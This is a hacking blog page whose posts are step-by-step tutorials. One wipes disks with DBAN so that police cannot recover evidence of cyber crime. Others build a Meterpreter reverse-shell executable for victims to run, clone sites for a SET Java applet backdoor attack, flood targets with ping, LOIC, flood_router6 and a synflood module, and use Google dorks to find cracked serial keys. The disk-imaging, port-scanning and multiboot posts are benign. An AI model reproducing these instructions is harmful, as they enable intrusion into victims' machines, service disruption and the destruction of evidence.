When cops are at your door step!

When it comes to a cyber crime evidence can decide whether you will end up in a jail or walk out of the case with ease. From our past experience we have learned that just by deleting the files you can't undo what you have done and there are methods and tools to retrieve deleted data. Thus we decide to find out a way to delete everything which can help the investigators to prove you are guilty. DBAN(Darik's Boot and Nuke) is a Linux distribution which is designed to erase all the memory and traces of it from the drive. It is a self-contained boot image that securely wipes the hard disks of most computers. DBAN is appropriate for bulk or emergency data destruction.

 How to?

  1. Download the ISO file and created a boot-able CD or drive.
  2.  Now once you are done Plug the drive or the CD in your PC and restart it.
  3. Now once DBAN boots up then type autonuke or quick and hit enter.
  4.  Your disks will be wiped clean.

Note:-
Autonuke will delete the ISO burned on the the disk as well if you are using a pen-drive. You can hit F3 to get the list of all the commands....
Posted by No comments :

Java applet attack with SET

All browsers run  java applet which can be used to gain access to the system. The beauty of such attacks are that the exploit code never touches the disk so such an attack can't be detected by the antivirus. Except Mac all the operating systems are vulnerable to such attacks.

 How to?

  1. Open the terminal and then type service postgresql start & hit enter and then type service metasploit start & hit enter.
  2. Now after you are connected then type setoolkit & hit enter.
  3. Now select the option 1 and hit enter.
  4. Now select the option 2 which is website attack vectors and hit enter.
  5. Now select the option 1 which is the java applet one and hit enter.
  6. Now hit 2 which is site cloner and enter.And enter your ip address (remember the Ethernet one).
  7. Now according to your target select your payload and backdoor.
  8. Now on another terminal type msfconsole and hit enter the type use exploit/multi/handler and hit enter and now set the payload with the set payload command and port and ip with the set command and start the multi listener.



Note:- 
When the user goes to the link he/she will be be prompted with a message shown below till he or she clicks install.


Posted by No comments :

Port Scan:The easy way

Port scanning is a technique to scan a system for open ports which can be used for exploitation. This can be considered the first step for hacking. This process can be sometime more technical but we would like you to learn the easy way to do it.

How to?
Android:-
  1. In Fing, you can scan the ports just by selecting the host machine and then Service Scan.
  2. In Landroid, you can select port scan and then entering the ip of the target and then selecting Go.
  3. In Dsploit, you can select the host then select port scanner.
Kali Linux:-
  1. Open the terminal then type zenmap (GUI for nmap) and hit enter.
  2. Now in the target box type the target's ip and then select the scan type then hit scan.

Note:- If the system detects the scan or the port discovery is off then you will not get the results. 
Posted by No comments :

Hacking window machines

Hacking windows computers have always been the first thing which you want to learn when you go into penetration testing as 3 of every 5 computers in the world are running windows on it. We don't intend to harm the reputation of Microsoft but hacking a windows computer that doesn't have any protection from any third party software is quite easy.

What you need?  
Kali Linux on VMware.. 

How to?
  1. Open a new terminal window type ifconfig and hit enter. Note down the eth0 IP address.
  2. Now type  msfpayload windows/meterpreter/reverse_tcp lhost=ip x > hcak.exe and hit enter. You can change the file name to anything you want instead of hcak.exe. 
  3. Now type service postgresql start and hit enter then type service metasploit start and hit enter.
  4. Now type msfconsole and hit enter.
  5. Now type use exploit/multi/handler and hit enter & after that type set payload windows/meterpreter/reverse_tcp to set the payload for the meterpreter.
  6. Now set the lhost by typing set lhost ip. And then exploit and hit enter.
  7. Now wait tell the victim runs the exe file and then you can connect to the victim.

Note:-
If the victim is protected with any fairly good antivirus then this method will fail.
Posted by No comments :

Google Hacks

Google hacks also know as Google dorks are specific keywords which can be used to dig out more details in a regular Google search query.

Now there are millions of such keywords we cannot discuss about each of these posts in a single post. So we will discuss about the most commonly used ones. 

  1. inurl: This keyword can be used to find out URL of multiple site having a certain URL query. 
  2. filetype: This keyword is used to look for specific file on the net.
  3. intitle:This keyword is used to find out URL with the specific  word in the title.
  4.  94fbr This keyword can be used to find serial keys(crack) of a software.
     




    For more hacks you can refer to the GHDB of exploit-db.com..



    Note:-

    we are using chrome in our demonstration for optimized results but you can eventually use any browsers as long as it connects to the Google's search engine...

     


Posted by 1 comment :

Creating a disk image:1st step in digital forensics

A disk image is a virtual image of a storage device which functions like a actual physical drive. It is the first step in digital forensics. In other words you don't what to contaminate the evidence with your shit. This can also be used to recover a complete disk.


 How to?
Windows:-
  1.  Download Winimage and install it.
  2. Run it with administrative privilege and now click OK.
  3. Now click on disk and then click on "create virtual hard disk image from physical drive".
  4. Now select your drive and click on OK and select the path of the directory in which you would like to save the disk image..

 Linux:-
  1. Open a terminal and type fdisk -l and hit enter.
  2. Now note the drive name.
  3. Now type dcfldd if=drive name of=file.dd and hit enter.
  4. Now type ls and hit enter to see if the file is created or not.  

Note:-
The file created by Winimage has .vhd extension and the file created on Kali Linux has .dd extension. Similarly if you use other programs then the extension may vary. The only thing you need to keep in mind is that you should be sure of the extensions which your forensics tool supports.
Posted by No comments :

Multibootable USB: Many OS one pendrive

A multibootable USB is drive which is  programmed to  boot more than one operating system without altering the computer on which it is done.This is helpful for demonstration purpose when you cannot carry your laptop or when you are working on some critical hack and you don't want to get caught. 


 What you need?
YUMI

How to?
  1. Plug in your drive. Open YUMI with administrative privileges.
  2. Now hit "I agree" for the license agreement.
  3. Now select your USB device from the drop down menu. In our case it was F and you can also select the format option if you don't remember the file system of you drive.
  4.   Now select the Linux distribution from the drop down list which you want to install on the drive. If you have the ISO and the program is unable to automatically locate it you can manually go to the folder in which you have saved it. But if you don't have the ISO then you can check the box which says "download the ISO".
  5.  Wait for it to do its thing. It will open the 7 zip or various other programs as per requirement so don't freak out.
  6.  Now it will ask you "Would you like to add more ISO/Distro Now on F:?". Hit yes and do the steps 4 and 5 again. 
  7. After you have installed all the distributions you want then you can click on finish.
  8. Now plug the drive in any computer and use your operating system.


Note:- 
  • You can only install a limited number of operating systems on a drive as each operating system has different size.
  •  And if your system has a CD drive then you might need to change the boot sequence in the bios.
Posted by No comments :

Denial of service attacks:Dos attacks

Denial of service attack(DOS) is one of the most basic attack which can be done against any network. In this attack we flood the network or web server with different legitimate looking requests an the legitimate user is unable to access the service. There are various types of denial of service attack depending on the type of request used. A distributed denial of service attack is a denial of service attack in which the web server or the network is flooded by different attackers at the same time so that the network or web server crashes(party play).




How to?
There are various ways and tools to perform a denial of service attack.
  1. The most basic way to perform an denial of service attack with and windows machine is by typing in the command ping ip -t -l 19000 here -t is for delay time of the packets and -l is for the length of the packet. But this method is outdated and hence the magnitude required to crash is very high. You can consider this as the method your grandfather will use to attack the networks which are of his age and are still being used without any alterations. 
  2. The second way to attack is by using the famous LOIC. Low Orbit Ion Cannon is an open source stress testing tool which has a GUI. It is easy to use as you only need to set the URL or ip and then hit lock on then you can change the settings as per your requirements and then just hit fire. This tool is available in both windows as well as android. According to some rumors the famous hacktivist group "Anonymous" use this tool in most of their attacks.
  3. There are various tools in Kali Linux to perform such attacks but the best way is by using the command flood_router6 interface where interface can be eth0 or any other interface if your target is using an windows regular or server version lower than 8. We haven't tested this on higher versions so we don't know how it may react against this attack.
  4. To attack a router with a SYN dos attack you can use the tool present in msfconsole. Just type use auxiliary/dos/tcp/synflood. Now type set rhost ip to set the ip of the host machine. At the end type exploit to start the exploitation.



Note:- 
These attacks can be easily detected by intrusion detection system which might block the specific port or alert the system admin.  This attack is often exaggerated by the media but is very weak against large setups. 
Posted by No comments :
Subscribe to: Posts ( Atom )